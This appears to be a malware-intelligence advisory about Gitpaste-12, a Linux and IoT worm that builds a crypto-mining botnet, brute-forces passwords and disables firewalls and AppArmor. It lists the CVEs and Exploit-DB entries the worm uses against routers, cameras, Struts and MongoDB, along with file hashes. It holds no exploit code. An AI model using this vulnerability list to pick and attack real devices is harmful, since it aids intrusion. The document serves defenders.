Advisory | Malware Intelligence |
Malware | Gitpaste-12 |
Targets | x86_Linux Servers/Linux ARM&MIPS (IoT) |
[/vc_wp_text][vc_column_text]Gitpaste-12 is a wormable malware which has the ability to form a network of bots for crypto-mining. Gitpaste-12 is also capable of cracking passwords via brute-forcing and using exploits for known vulnerabilities on infected hosts. The malware uses GitHub and Pastebin to host its code and payload. Pastebin is used as a Command and Control (C&C) to control its victims.
As part of defence evasion, the malware disables firewalls, monitoring solutions, Linux AppArmor etc., to prepare the environment for further compromise. It also targets lower-end systems of ARM and MIPS, especially IoT devices.
CVE-2017-14135 | Webadmin plugin for opendreambox |
CVE-2020-24217 | HiSilicon based IPTV/H.264/H.265 video encoder |
CVE-2017-5638 | Apache Struts |
CVE-2020-10987 | Tenda router |
CVE-2014-8361 | Miniigd SOAP service in Realtek SDK |
CVE-2020-15893 | UPnP in dlink routers |
CVE-2013-5948 | Asus routers |
EDB-ID: 48225 | Netlink GPON Router |
EDB-ID: 40500 | AVTECH IP Camera |
CVE-2019-10758 | MongoDB |
CVE-2017-17215 | Huawei router |
Note: EBD-ID : Exploit Database ID
URLs
Service Ports
Hashes (SHA-256)
E67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9
Ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b
Bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1
5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3